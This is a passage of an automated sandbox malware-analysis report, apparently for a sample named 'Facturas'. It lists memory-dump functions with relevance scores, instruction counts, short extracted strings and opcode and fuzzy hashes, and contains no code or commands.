Instruction Fuzzy Hash: 97418A30E0428ADFDB15EBA9C4885ADBBF1FF44304F1485A6C881EB354D734AE46CB51

Function 02D80D03 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

Teq, xrefs: 02D80D63

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 7a309565386ebb25eafe1186023eaab5ae28e41b246e54fcb5c2a1f2c30cde03
Instruction ID: 2d60437797d392ccffe0515497d4931eabf8674c5ebde56281fd580d87130ffa
Opcode Fuzzy Hash: 7a309565386ebb25eafe1186023eaab5ae28e41b246e54fcb5c2a1f2c30cde03
Instruction Fuzzy Hash: F5313775B401148FD744EF68D598AA9BBF2EF88721F258069E406DB371DA719C05CB80

Function 02D809B0 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

Teq, xrefs: 02D80AA4

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 814a7d62f7ddbb6b58cc5b526c06e1022226bb5ccfd496fe29157d6913bb0751
Instruction ID: 334fed732e075d13b02221610d371c9920e3275c33f4fd6b36814b73c9e77b0b
Opcode Fuzzy Hash: 814a7d62f7ddbb6b58cc5b526c06e1022226bb5ccfd496fe29157d6913bb0751
Instruction Fuzzy Hash: FD216D70A88209CFD714FBA4C4557FE76B1AB48712F14846AE583AB394CB748D49CBA2

Function 02D809C0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

Teq, xrefs: 02D80AA4

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: e1053be847d83163a05f9040c211c292eaab4d8eb524d5f7cb24f5478d2e2a4b
Instruction ID: fc853e093da05686d28b659e465d2859665c313f3564956152aef76e6156028e
Opcode Fuzzy Hash: e1053be847d83163a05f9040c211c292eaab4d8eb524d5f7cb24f5478d2e2a4b
Instruction Fuzzy Hash: 4A218070A4C108CBE714FB65C4157FE7AB1AB48702F148429E583B7394DB70CD48CBA2

Function 02D80CE3 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

Teq, xrefs: 02D80D63

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 78cf486294d5b1dc314fe909b3053828bc3318beb244ea886345122aae189a59
Instruction ID: 05c941ba92a34d17c5b131d360d20f66f49f1366d9591a2d560ba319689fb27c
Opcode Fuzzy Hash: 78cf486294d5b1dc314fe909b3053828bc3318beb244ea886345122aae189a59
Instruction Fuzzy Hash: D821BD30A40204DFDB45EF68C485BAEBBF2AF49311F148069E906AB7A2EB759C05CB51

Function 02D80AA3 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

Teq, xrefs: 02D80AA4

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: e6fe51bd37786a4969233c87102737ba1fbc1041cc82283f2fc6e8bf24c9cd3d
Instruction ID: d42209fe7639936e2fd8810a3568d7b2a5bfefc0d6ea1c9ac2a03a87e90549e0
Opcode Fuzzy Hash: e6fe51bd37786a4969233c87102737ba1fbc1041cc82283f2fc6e8bf24c9cd3d
Instruction Fuzzy Hash: CE116D70A48109CBEB14FBA4D4557BD7AB1AB58702F148469E583BB394DB70CD48CBA2

Function 02D80F80 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

8q, xrefs: 02D80FE6

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: 8q
API String ID: 0-4083045702
Opcode ID: bd4e4cc8bbee1cb005213d8eae45aefc9214c79f6942ac7f14e002d861283912
Instruction ID: 7f088dac54308a2a7fecf6eda806347fac7bebf35b2732dcb2616a46ca0c6c31
Opcode Fuzzy Hash: bd4e4cc8bbee1cb005213d8eae45aefc9214c79f6942ac7f14e002d861283912
Instruction Fuzzy Hash: 1501F275D08305EFCB01FBA4E450AB8BBE0EB48251B01C0A6E5469B3E0D734DD09CF92

Function 02D80F90 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

8q, xrefs: 02D80FE6

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: 8q
API String ID: 0-4083045702
Opcode ID: 04363ec2fe9e65822915be72532e080cf1ee746c897aa84fb54b9ebd2ac21d87
Instruction ID: ae66d1dd070ef2054b09c94cf729da80ae72671bf2fd5aba739519798f5e96d5
Opcode Fuzzy Hash: 04363ec2fe9e65822915be72532e080cf1ee746c897aa84fb54b9ebd2ac21d87
Instruction Fuzzy Hash: 39F04F75E04309EFCB10FB69E454ABCB7E5EB88241B01C066E6469B794DB30ED09CF91

Function 02D82D64 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45eb449496a39c1668c51620912593cc36d46c49f1c7ea46bd70cc683324c08
Instruction ID: 441b9d30d85ce5f268ab306fd7bdc37a3e08a92e5f22d44d29545bee69c7d2a1
Opcode Fuzzy Hash: c45eb449496a39c1668c51620912593cc36d46c49f1c7ea46bd70cc683324c08
Instruction Fuzzy Hash: AF71D271A042858FDB15DB68C8946ACFBF1FF49300F1985AAD896EB392C334DD41CB94

Function 02D8119F Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 292221037a7c9557596276b44bfb9433718ee5ff957346cec16a0f3423f40edc
Instruction ID: b8198333d177aab13a4c3e48a4dd29c9af7b359b63a3792a2173fb88ac67b24c
Opcode Fuzzy Hash: 292221037a7c9557596276b44bfb9433718ee5ff957346cec16a0f3423f40edc
Instruction Fuzzy Hash: 8B715C75B002199FDB04EFA9C894B6EBBF2BF89700F148069E505AB3A5DB74DC46CB40

Function 02D82620 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122a1650bac1a239fdb21cb703104d115a62e960e0ee7695b5daa6223138b350
Instruction ID: aba6f7eaf741f78efa8de6d09927bae48d07b1e4718a5943c9947593e833b561
Opcode Fuzzy Hash: 122a1650bac1a239fdb21cb703104d115a62e960e0ee7695b5daa6223138b350
Instruction Fuzzy Hash: 6A613E34600B818FD725EF26C598626B7F2EF98314F148A2DC88B8BB55D774EC46CB61

Function 02D81E08 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e515dfcc5000e2b6b34239b0792d99847db25e30cce6e2233c8d203ceb1c2628
Instruction ID: 5717a2a0a4f6bd1c6b3b99aae04c489018e3057e8ada6fb603b0121d0eff77d4
Opcode Fuzzy Hash: e515dfcc5000e2b6b34239b0792d99847db25e30cce6e2233c8d203ceb1c2628
Instruction Fuzzy Hash: CE51A173608615DFCB15EF55D4409BEF7B5FB80220B148A2AE49E9B740C370ED0ACB92

Function 02D80B22 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08537f6ba64f0b9f185b9577a633c7ea7a7e38ce2248f42271e7569ba44ff811
Instruction ID: b6968ea19de03e9621f342a29ecf335390a38f9750d78f0e0f2d0b9f1fc49bac
Opcode Fuzzy Hash: 08537f6ba64f0b9f185b9577a633c7ea7a7e38ce2248f42271e7569ba44ff811
Instruction Fuzzy Hash: 9E31F430B083458FC702BBB488505BE7BF1EF81216B0540AAC492DB351FB74ED0AC7A2

Function 02D83FC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5b380de43eae8ad11a13ddcfd4079920e7890721bd2fc541706b7225b38e3b
Instruction ID: 1e404e8bcc9baafd53f7ed5c190a25e40f8dd4cc075bbdbe3305f2cf7bc70390
Opcode Fuzzy Hash: 7a5b380de43eae8ad11a13ddcfd4079920e7890721bd2fc541706b7225b38e3b
Instruction Fuzzy Hash: 01214C71A08512DFC754EB68C844A7BB7B4FF8871072281AAE59BEB361D631DC41CB92

Function 02D817F8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7c170c789acd816332f040bf58a17e18e17194822701ff0afd07d133b7d94f
Instruction ID: 00b337db5a39693984d62c2a403cae0590246c3d10f3e21dd86baaf685197359
Opcode Fuzzy Hash: ff7c170c789acd816332f040bf58a17e18e17194822701ff0afd07d133b7d94f
Instruction Fuzzy Hash: DA216B36A04104EFDB15FBA4E48AAF97BB1FB84214F010526D14E97345DB30DD0ACB91

Function 02D8B600 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5687a082029e3d0a626a8eeafd37af11a2977607b00cdcdeea63c4fd36b8d1f2
Instruction ID: 15b4463cf3647b3118abd1c102a47be3ec82cd204c6a24f361bcd295813b31a0
Opcode Fuzzy Hash: 5687a082029e3d0a626a8eeafd37af11a2977607b00cdcdeea63c4fd36b8d1f2
Instruction Fuzzy Hash: AE311470905248DFD740EFA9C049BAEBBF1FB89308F5081AAD409EB394DB348A84CF51

Function 0140D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248520370.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140d000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08f11c7a6e9c6d1919ccabbb7896de76b7b9b766109f7029f968c53799a03a6
Instruction ID: 672aeb47f052646d44042c0321f39ec854aacaf5e1618db57f4a226b5fb4e0ce
Opcode Fuzzy Hash: c08f11c7a6e9c6d1919ccabbb7896de76b7b9b766109f7029f968c53799a03a6
Instruction Fuzzy Hash: 032125B1904240DFDB16DF94D9C4B17BBA5FB84318F20C57AE9090B3A2C336D44BCAA2

Function 02D8193D Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a70f946d147431e83802e44100a5eb69b5f82ac1a4d245b0b99d66122d2254d
Instruction ID: 820758421d66c8d3d6903cbbd046f346172b3740e8421b58192713765defb01e
Opcode Fuzzy Hash: 6a70f946d147431e83802e44100a5eb69b5f82ac1a4d245b0b99d66122d2254d
Instruction Fuzzy Hash: 7D21A474B01205DFCB05EFA8E4949ACBBF2FF89315F1841A9D10697365CB309C06CB61

Function 0140D006 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248520370.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140d000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c345bdc8b7f824c7ee888b7936789a64b5c76a44822cf257e5e9ed090f3570fb
Instruction ID: ecbffa1a602aa6ee65f962f36aa3d9dce4c6f544e88a32d864d01fa2fb68a0e8
Opcode Fuzzy Hash: c345bdc8b7f824c7ee888b7936789a64b5c76a44822cf257e5e9ed090f3570fb
Instruction Fuzzy Hash: F821B3714093808FCB13CF64D994716BF71FF46214F2881EBD8498B6A3C33A980ACB62

Function 02D81CC0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55e3fd2bbf1419de9645d793d822d61f380217761a9c2aa4dd75178176458bfe
Instruction ID: 2794fb023f1499a333ce9c70be507f06b10adc5c8c540f3a623e08c172a01081
Opcode Fuzzy Hash: 55e3fd2bbf1419de9645d793d822d61f380217761a9c2aa4dd75178176458bfe
Instruction Fuzzy Hash: E811B230608204CBC708BA54C014BBEBBF9BF49610F10415AE58F9B350EAB1DC4FDB91

Function 02D81CB0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1718d76f6a2660f7c8eb158ab2ce31301601a512777646b73af6d3e7943cede
Instruction ID: 330fd3d4bdf739eadfaaf07aea84538c65430668b7861a09006e1ffbf3dc8561
Opcode Fuzzy Hash: a1718d76f6a2660f7c8eb158ab2ce31301601a512777646b73af6d3e7943cede
Instruction Fuzzy Hash: 9C119130608209DBC758BA94D004BBEBBF5BB49210F10019AD58BAB350EB71CD4EC791

Function 02D817E9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78f14ceb164f3fbab19417a50681cc09d8b59efb9a55445b60f6ea8d70cda7a
Instruction ID: 105f273eebd532b92131ec037d3bea5dc8363e96aa276d44897b39c2c974eccd
Opcode Fuzzy Hash: e78f14ceb164f3fbab19417a50681cc09d8b59efb9a55445b60f6ea8d70cda7a
Instruction Fuzzy Hash: 9F118835904204EFE719FB64D48ABB937F1FB88314F01462AD04AAB355DB75DD0ACB90

Function 02D80C2A Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74edd5f17ec35e34b64da51b97487e77d07a2addcbdf44b42f05227aa3b18c9f
Instruction ID: bf523166744ab1ad750cc875261277ce9c53b8292ac5c9d9974b5dfb158584e8
Opcode Fuzzy Hash: 74edd5f17ec35e34b64da51b97487e77d07a2addcbdf44b42f05227aa3b18c9f
Instruction Fuzzy Hash: 55015E30A08205EBCB18FFA980406BD7BB1BF91342F1044AAD6979A345EB35DE4DC792

Function 02D81A18 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e15b9a88ce517de5c85dec532f88cc1488d77502aff87a22c1dc1218dfe86e
Instruction ID: 4f973760e08e2a39f99b1ee688635461f10831c9294f22dcb8ab1bac4a3e68df
Opcode Fuzzy Hash: 07e15b9a88ce517de5c85dec532f88cc1488d77502aff87a22c1dc1218dfe86e
Instruction Fuzzy Hash: A4115E74E0060ADBDB10DFA9D054799B7F1FF88300F24CA19E559A73A4EF70A881CB90

Function 02D80C38 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5796bdba16c64217563f2377130549d9e69406d40b29610b74fb26d017b8f49a
Instruction ID: 83646667b3e3809a3e5ee73eb412850e6b2831bb0f47891ec343ca782acb993f
Opcode Fuzzy Hash: 5796bdba16c64217563f2377130549d9e69406d40b29610b74fb26d017b8f49a
Instruction Fuzzy Hash: 3F011D70E08509EBCB18FFA984816BD7BB1AF94342F50846AD69796344EF30DE4CC792

Function 02D81D6C Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdf5339c26cbe418146d21c27a13b2a564c56274c2c964543347dbaed34abdd
Instruction ID: b2c1278cec00334031be356510e1823228a1bb7da09ca473f24a7f46b3cef915
Opcode Fuzzy Hash: 6cdf5339c26cbe418146d21c27a13b2a564c56274c2c964543347dbaed34abdd
Instruction Fuzzy Hash: 06016930608215CBDB08BA80D004BBDB7F4BB08610F100156E59FAB360E7B5DD8FDB92

Function 02D82990 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8105302f4c541e45116b11f46debb25ec3f41a490bd267a55175acfcab716ccd
Instruction ID: b3f9e36b8456694edbede20b44f8cd233f0e0ceea45d68965ac00aae14a4fb62
Opcode Fuzzy Hash: 8105302f4c541e45116b11f46debb25ec3f41a490bd267a55175acfcab716ccd
Instruction Fuzzy Hash: B901AF3060D3C48FC307A7B89464299BFB1AF47210B1E41D7C5D5CB367C6289C4AC766

Function 02D80EC8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4abcb50452f5d101392fd956362a5721c1136022dd7feffb6e6cbe51f6152a8
Instruction ID: 57878391150b91e16dbef514ba8fbcc4fe89dd01d61025f421091cfa590fea95
Opcode Fuzzy Hash: a4abcb50452f5d101392fd956362a5721c1136022dd7feffb6e6cbe51f6152a8
Instruction Fuzzy Hash: 22F03171D1820ACFDB05FFA9C4012BFBAB1EB44302F10C46A9956A2384E7349D49CFD2

Function 02D81D87 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abaa61bdd926f8e92f7e23d55cc5d680099541cfec877ec6bdc62eff1c49c040
Instruction ID: 5faf143ff8c56492243c58b813a76655084d7ddd1d3541b1c8ac589cec07b55f
Opcode Fuzzy Hash: abaa61bdd926f8e92f7e23d55cc5d680099541cfec877ec6bdc62eff1c49c040
Instruction Fuzzy Hash: E7F0F6355047019BD326EF25E8405D9F7E2FFC9364744C96AC28A8F6A9DF30AC4AC7A1

Function 06565E37 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699b84a3a0d62da5522aa4caab101976ae4fecfebf2089735d12676ac79f483a
Instruction ID: 995e80cff24b811fd0c6abd39588ddaddf8145712258dce16a195397376bf3c7
Opcode Fuzzy Hash: 699b84a3a0d62da5522aa4caab101976ae4fecfebf2089735d12676ac79f483a
Instruction Fuzzy Hash: 8F11A578A08218AFCB65DF18D8946DAB7B1FF89304F5041EAA80DA7394DB305E85CF91

Function 02D82945 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbfd80874ba7d9b95da2852a2c46df0b72af42ec77eaeb4ab2b5f8fcd2272019
Instruction ID: 5ff56dccef3c8724cf2303ae3f568dd8bdcf9290f8c9d108424080ab8a00440a
Opcode Fuzzy Hash: fbfd80874ba7d9b95da2852a2c46df0b72af42ec77eaeb4ab2b5f8fcd2272019
Instruction Fuzzy Hash: 82F0F03060D3C18FC703A7B8D464299BFB1AF86210B1D40D7C8C5DB3A6C6389C4AC765

Function 06562C38 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66d231178f2cb10c3cc45bb8b0cc7fd8618788fcef8aa291d1ad2f2754c3b54
Instruction ID: 109932d95115c5bc5a3ddf880030af0db2d569070093f16999aef8d958b58fdb
Opcode Fuzzy Hash: e66d231178f2cb10c3cc45bb8b0cc7fd8618788fcef8aa291d1ad2f2754c3b54
Instruction Fuzzy Hash: 5D01C878A002188FC754EF59D894AEAB7B6FB8A708F1041D9E61DA3794DB305E82CF40

Function 02D82242 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5417b785bca0e309b497f13526ae54eeb9153bdddb16055e53ce913a0e9134
Instruction ID: 0459666da76b887058db66f6d11986ef15a9d88d191fb2fa0da38b2f59f899e8
Opcode Fuzzy Hash: 4c5417b785bca0e309b497f13526ae54eeb9153bdddb16055e53ce913a0e9134
Instruction Fuzzy Hash: 27F0E932504B828FC732AB31EC5435A77A0BB41314B044A35C1478F5E6D734AA06C751

Function 02D80ACA Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3a981da35915afeac6ec65fa3136101a3d78858190536befff487181054d88
Instruction ID: 95d341745bcf77865f85561ed238422b0c2c5081e5a705347e188f8bbc0c5057
Opcode Fuzzy Hash: cd3a981da35915afeac6ec65fa3136101a3d78858190536befff487181054d88
Instruction Fuzzy Hash: BEF05870D48249EFCB41EFB8D9418DCBFF0EB85211B1041AAC806DB311E6340E45CB61

Function 0657BE38 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c098ca335b90aa5b56fed89a93c5620fce4cd438659796846c331aff9ea08a
Instruction ID: 9c84849887b32df46c8fdaf4d871884cacdf5295c79c14442d0a3dd4d61c2590
Opcode Fuzzy Hash: 58c098ca335b90aa5b56fed89a93c5620fce4cd438659796846c331aff9ea08a
Instruction Fuzzy Hash: 0AE0C274E04208EFCB84DFA9D944AADBBF4FB48300F10C1AA9D08A3350D731AA51DF81

Function 0657A3C0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c098ca335b90aa5b56fed89a93c5620fce4cd438659796846c331aff9ea08a
Instruction ID: e3cd38a7cd5cef73751d7ec594f2569d4b2a4837a36bc5bb77082b20bcb10270
Opcode Fuzzy Hash: 58c098ca335b90aa5b56fed89a93c5620fce4cd438659796846c331aff9ea08a
Instruction Fuzzy Hash: 1BE0C974D04208EFCB84DFA8D584A9DBBF4FB48300F10C1A99818A3351D7319E51DF81

Function 06575C58 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c098ca335b90aa5b56fed89a93c5620fce4cd438659796846c331aff9ea08a
Instruction ID: cf39018cf84f3612330dd50e841328db27afab9c5ef4fed21f39470061024a5e
Opcode Fuzzy Hash: 58c098ca335b90aa5b56fed89a93c5620fce4cd438659796846c331aff9ea08a
Instruction Fuzzy Hash: F8E0C974D04208EFCB94DFA8D54569DBBF4FB48301F10C5A9984893350DB319A51DF81

Function 06561D9B Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70c01ae73c4df2c2e7491a9a3063ff3e3ce97ce0c919d2323d4bf19d9429f7e
Instruction ID: 005d20c7f200156b0661672d2f93c390af818cc5c7cf0765eaa4c891ee5b233f
